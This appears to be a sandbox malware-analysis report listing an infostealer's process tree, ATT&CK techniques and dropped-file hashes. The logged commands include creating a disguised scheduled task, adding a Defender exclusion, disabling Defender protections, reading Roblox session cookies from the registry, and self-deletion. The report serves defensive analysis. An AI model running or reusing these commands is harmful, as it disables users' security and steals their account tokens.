C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:3068
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ldld.exe"C:\Users\Admin\AppData\Local\Temp\ldld.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4588
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\ldld.exe"3⤵
- Views/modifies file attributes
PID:1376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ldld.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6072
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5696
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:4392
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:4524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5276
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:2864
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\ldld.exe" && pause3⤵PID:5184
-
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:5604
-
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3308 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1316.0.1278140845\1218399133" -parentBuildID 20230214051806 -prefsHandle 1740 -prefMapHandle 1732 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a77af659-824e-4e80-a1bd-519393fe0950} 1316 "\\.\pipe\gecko-crash-server-pipe.1316" 1840 28562c0be58 gpu3⤵PID:3556
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1316.1.1296331901\1002623602" -parentBuildID 20230214051806 -prefsHandle 2428 -prefMapHandle 2416 -prefsLen 22112 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {634e83c5-9e65-41f5-8fdc-22d951de14ea} 1316 "\\.\pipe\gecko-crash-server-pipe.1316" 2456 28555e85658 socket3⤵PID:1380
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1316.2.1923101871\146588282" -childID 1 -isForBrowser -prefsHandle 3164 -prefMapHandle 3160 -prefsLen 22150 -prefMapSize 235121 -jsInitHandle 896 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {675cf94c-3edb-4330-b325-85e1e44401ba} 1316 "\\.\pipe\gecko-crash-server-pipe.1316" 3176 28561b90358 tab3⤵PID:1296
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1316.3.234200603\422591941" -childID 2 -isForBrowser -prefsHandle 3556 -prefMapHandle 3552 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 896 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6167348f-ad46-4bfc-971b-a2be72548f21} 1316 "\\.\pipe\gecko-crash-server-pipe.1316" 3484 28567676e58 tab3⤵PID:4576
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1316.4.140835392\1705947291" -childID 3 -isForBrowser -prefsHandle 5068 -prefMapHandle 5064 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 896 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {68f6c326-69e5-470c-b78e-e28b72d1910b} 1316 "\\.\pipe\gecko-crash-server-pipe.1316" 5076 28568fc7358 tab3⤵PID:5704
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1316.5.1746687221\1747408989" -childID 4 -isForBrowser -prefsHandle 5216 -prefMapHandle 5220 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 896 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fa1346f3-695b-488b-954a-cc81120ff02e} 1316 "\\.\pipe\gecko-crash-server-pipe.1316" 5204 28569697758 tab3⤵PID:5720
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1316.6.2020912841\812388391" -childID 5 -isForBrowser -prefsHandle 5424 -prefMapHandle 5428 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 896 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {370b495e-242e-4a44-b17f-d804208aaa8b} 1316 "\\.\pipe\gecko-crash-server-pipe.1316" 5416 28569696558 tab3⤵PID:5728
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1520
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1920
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
- Loads dropped DLL
PID:5320
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵
- Loads dropped DLL
PID:1272
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
152B
MD5c39b3aa574c0c938c80eb263bb450311
SHA1f4d11275b63f4f906be7a55ec6ca050c62c18c88
SHA25666f8d413a30451055d4b6fa40e007197a4bb93a66a28ca4112967ec417ffab6c
SHA512eeca2e21cd4d66835beb9812e26344c8695584253af397b06f378536ca797c3906a670ed239631729c96ebb93acfb16327cf58d517e83fb8923881c5fdb6d232
-
Filesize
152B
MD5dabfafd78687947a9de64dd5b776d25f
SHA116084c74980dbad713f9d332091985808b436dea
SHA256c7658f407cbe799282ef202e78319e489ed4e48e23f6d056b505bc0d73e34201
SHA512dae1de5245cd9b72117c430250aa2029eb8df1b85dc414ac50152d8eba4d100bcf0320ac18446f865dc96949f8b06a5b9e7a0c84f9c1b0eada318e80f99f9d2b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize72B
MD5012c4b0b8efe0b79cd27a82c9532d6c1
SHA114bddc371205e2159b1b79d7561c316d4d125466
SHA256ba0ff1d654f50844fd51b90d1e8cb2e0dde530f8502c9552ee93c28ce383f30b
SHA512e7d7c29a884c0705b86bc119b893fbcb07cb64c0a8c04a0a772775db596ac7f600f82d8b28d6fcdb26e68192975451e9166a85d169446233414424e5b360f0cc
-
Filesize
6KB
MD5314a7c71bb8806a3187380c7f0d3b332
SHA190edf4f6c790e7e2c2c4f92198e08fb6a18d9d3f
SHA256535e78cac058006a17b453729161aab85dc76ee537e8e7b6e40113dc9bfa66dd
SHA512c3a364c4dde062faf163eb15637367c05102a5b2252fb49cdd7b735781021f855ffdea910302122256d15e2553dc91609aad890a6d78009a7beebca7f86e6555
-
Filesize
6KB
MD57f9f8998ff98e4f325fba72eb8d0f6b9
SHA14a4715f0bde5cdd28b1fe9b91f0382f984b29138
SHA2565b7a02a10e60d700ee23ece79aa925da3bd3ccb4e568c573a404e2d8eeabd780
SHA5124ca2b77e8d7bcc8d2a1f0cd0616b100968a1b9f666df0f88ce8b53b558ea414dff4518d5ff1566c7e44762bf17f655e7d0f556749865d135165f9e04f2fd6ace
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD5eeee03133601b11b316cb34e790bb1e3
SHA1c9ebdfd7d8db6530ceef3700bd101456e6b96744
SHA256c6c118c3b5035d9271082551b65c1988dc27701ef97b373f3dc0c88f7921c89b
SHA512faa0e8b70f2b48cf8bf7c2f5f153e0aedddce00fae66174983547598f7a4e63a011c7405077695d754bc131bd13d1218ba69a0437e59b7bc61cade84bbcca993
-
Filesize
1KB
MD5548dd08570d121a65e82abb7171cae1c
SHA11a1b5084b3a78f3acd0d811cc79dbcac121217ab
SHA256cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc
SHA51237b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b
-
Filesize
1KB
MD55c964bb22371323b8064895892ab211e
SHA1a23e9564b96d7a3e8b4a90abd0c7993d87e314fe
SHA25680229da91bb7b07ea68d18e5a89a54988520c314030b252bd0e14584bbb0669f
SHA512dd32dc25e1150fe04d0dde6677d3a555cd7c0428faf2ad071e4bb7e434c808c6c17186e55867330f78f528009b74e511644f1278815551c3e19b37532151f1c8
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
948B
MD51a58f982c18490e622e00d4eb75ace5a
SHA160c30527b74659ecf09089a5a7c02a1df9a71b65
SHA2564b7f800c0dea209162cc86627983993127eb20e3f8616646c41cb3ce15d9b39d
SHA512ddab516a967783c5951717853aa5b3ef6dd5b442db50092888b2e7f3179fc68120fcde69a08d6ab280740eaadb6eadfc758c3118b52706f869e48ac1aebda480
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\rfj66zji.default-release\activity-stream.discovery_stream.json.tmp
Filesize22KB
MD58ce536d6337c68074bb1af1c69a3d0d7
SHA1bfa3aa6db4dea51132c3ad144dfbd3263e630f95
SHA256e256ba0e2f7462fe69f15596c925d1b68f8179929d51041ff81aa105e3f648f8
SHA51250ace5e6774f09f06fce136e9384084bbe9a56eec4fd9aaeace3a09c6885defab61d5bf40f27704e1526d161e6a472e5229d79e97ba1eef58de6a2b0e475cb23
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\rfj66zji.default-release\activity-stream.discovery_stream.json.tmp
Filesize23KB
MD510120e2a277cda42f738feff1f41d22c
SHA157716f75c229dc82f5f8ffc865d2b123abfa8da7
SHA256a9e4298a5efa727c6a3364bcdfdfbeabab97344f345a087190b9890415f18a27
SHA512169c2baddc90a71f1c3f3898875dc3a4f30befa9c0b185b9fd7ecf6c3c39e35d4e8caa954f4ea323ea0443a1cc6986463179f0df669e4cb1c7b4a509979794ff
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\rfj66zji.default-release\cache2\entries\383A97A57B113BD106DE6984E6DBA5F537327263
Filesize13KB
MD5384f150c5b29cc463b1b942353ae32f0
SHA12fc7f32989184d864ca94a3e58826aed7f12f424
SHA256389eac929c09c7d3e6d876541d512c548a07cf7990ed8dc3d405d7ea19db700d
SHA5129b2750d534d8c0fcade50d484df764105b3bf24878c0c1f993470372e9be8bf651e92c3225425b2bc642df712a479127ea69e81e78c36f6937b3b4f37ee1c9d4
-
Filesize
517KB
MD5ae357200b048e8623e2c69ddec553db5
SHA18ca678c49a82f93304a6bd2de2b88abbc966cfa5
SHA256f7e68891530b6a1a97022a9787dfdb363f1a531fc6d0e7f45355a836c2805d09
SHA5124a1960f43b502065c9a955d2bbe8973d91245abf297b33c7244b60561eb4d71519a8996148e41fdd072a7127199b7b8791cb0206854b6573eb3e4ec48bc5f0b6
-
Filesize
7.3MB
MD543cb480944627cc538b1d6aba4ddef6d
SHA1dc421528bf98e998cd01a17602fe63c08a17ae57
SHA2567a5df9d2619482c2b1ae44d7099f3c184723cd06a78c45261eefd4fd5d6a175f
SHA5129b6b81d682ce9cf605b1f1d910511c649454d0eb53edf0c8e022bcc4b1f65fd680fd5a4e963f76079d1a41a7d2cc24d306ca717271e7d9e55b73dc17a91bb67c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
231KB
MD5a91ab29228d60f9cb47da5acaae2fedc
SHA1b4fd1d0a1119828ae5054b4cf73a2245531ed5e9
SHA2560866614015dd5f9dc4878af196cb61213d9e243127a9c2be0facb07b6777dd36
SHA5128e7c07e45c6e09fa07b60aa9af63ae7de91ab3c39804bca4dd01fe1ea7dbc96ad8eeb74943ce4c6afab2db1ce0da1a7b93ac2fb20f4c3f3af6fc1c3e7439c607
-
Filesize
442KB
MD585430baed3398695717b0263807cf97c
SHA1fffbee923cea216f50fce5d54219a188a5100f41
SHA256a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA51206511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1
-
Filesize
8.0MB
MD5a01c5ecd6108350ae23d2cddf0e77c17
SHA1c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rfj66zji.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
Filesize997KB
MD5fe3355639648c417e8307c6d051e3e37
SHA1f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA2561ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA5128f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rfj66zji.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
Filesize116B
MD53d33cdc0b3d281e67dd52e14435dd04f
SHA14db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rfj66zji.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
Filesize479B
MD549ddb419d96dceb9069018535fb2e2fc
SHA162aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA2562af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA51248386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rfj66zji.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
Filesize372B
MD58be33af717bb1b67fbd61c3f4b807e9e
SHA17cf17656d174d951957ff36810e874a134dd49e0
SHA256e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA5126125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rfj66zji.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
Filesize11.8MB
MD533bf7b0439480effb9fb212efce87b13
SHA1cee50f2745edc6dc291887b6075ca64d716f495a
SHA2568ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rfj66zji.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
Filesize1KB
MD5688bed3676d2104e7f17ae1cd2c59404
SHA1952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA25633899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA5127a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rfj66zji.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
Filesize1KB
MD5937326fead5fd401f6cca9118bd9ade9
SHA14526a57d4ae14ed29b37632c72aef3c408189d91
SHA25668a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2
-
Filesize
7KB
MD56f9f15548bcdf40e087c558cc93f7340
SHA1f602d097da464e50c5fedaebeec233910300dfe0
SHA2566aaf31651fd90aeb9257a0ec5ac219e734004a3e2cab18d85839f9d860e4c396
SHA5122c82ed8759be956a934d945c13447fd995affc28f143719bbcb0baf1b115d7fcfa1501ef4421e8012e3373f7898c9d78602367b28f109d7fa5cae5d3d80c079c
-
Filesize
10KB
MD59b318e2e174a30fb21c6554e89ef0379
SHA10be826b960aa826ad472b6509b6ba6c7b0c01dda
SHA256da0306ecaf7400c3f69fadfea5b5730ab17545f33510e76a712eb242c75fb8d4
SHA512ef36bcb78d363ff7cd2312cfac6f2714210cc5df9b4ed5abe0c4034c69ccba24e1456618ee67a2326b5a0d9214cc12d7aa3be653e003b80b1e6c5f442a407bec
-
Filesize
6KB
MD5e2df5836105dd67c215555179da84137
SHA1156ef4d1578909b3c0b274ead501be1ceba5738d
SHA256c919de796d5dbbb92b7b58015a20e25cf89f4e7aeef252e412d50e3c0f923f95
SHA51237b43089c2065a81d2c1a8482cc9a8a04504fb125bc0aedf429880ae54b1f52d5f77892f7ff9f6991decd00e30a9c30267a116e54e04b9a1770be697a4d60136
-
Filesize
6KB
MD5470f6bbb578157fd068f14a80551b858
SHA16c6ee9445299e76495dd727c93fb9d8dcc80e0ec
SHA25611fc8a408b607c4b0e0da0b02ec7c18d6b8731bc293513456ff379c02ec2b1e3
SHA5122e919f1569e448d39caefe25f5596fd8224a0ecdfdcfd0a879e107630498256b13c67b327a5a1a4ae4e450ed07e2f9290df18bcad7f860af2677b00552db456d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rfj66zji.default-release\sessionstore-backups\recovery.jsonlz4
Filesize1KB
MD5b47ff0e8868b6c541bc6af1f873f6e0f
SHA1e5a33d34089629d36f0c6dcdb69577d30b31217a
SHA256c0d7f75b4c60102453efa31c6fe8f1ae5ef5d5986f43e929a5c6e0ca2a7cdb4a
SHA5126ba56874ba39e7c7d99cb266b2bb63a4b902275dca466150abcd65072660f6e359e093dba3daf81821aa034cf1b04056b18e3a7a8f2a67dcb81caa0e0f548b89
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rfj66zji.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize1.4MB
MD55c70491513ead7713b3643c516b2c2f6
SHA1f62b3e3ef6250446766dd359a0e45afffc46484c
SHA25690b1012e25dacee051696814d182606af8e2704c575f7c4a31226aef4d20cb67
SHA512ceb41f4f4a27f9ade45a04083abf466c4b40b75ca3e333ba2346db8271e9a843eb30e79deb679158ab2ecb059d5cd97e4856cd2f87822d557693ebee4f5de293
-
Filesize
2KB
MD54028457913f9d08b06137643fe3e01bc
SHA1a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14
SHA256289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58
SHA512c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b
-
Filesize
136KB
MD516e5a492c9c6ae34c59683be9c51fa31
SHA197031b41f5c56f371c28ae0d62a2df7d585adaba
SHA25635c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66
SHA51220fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6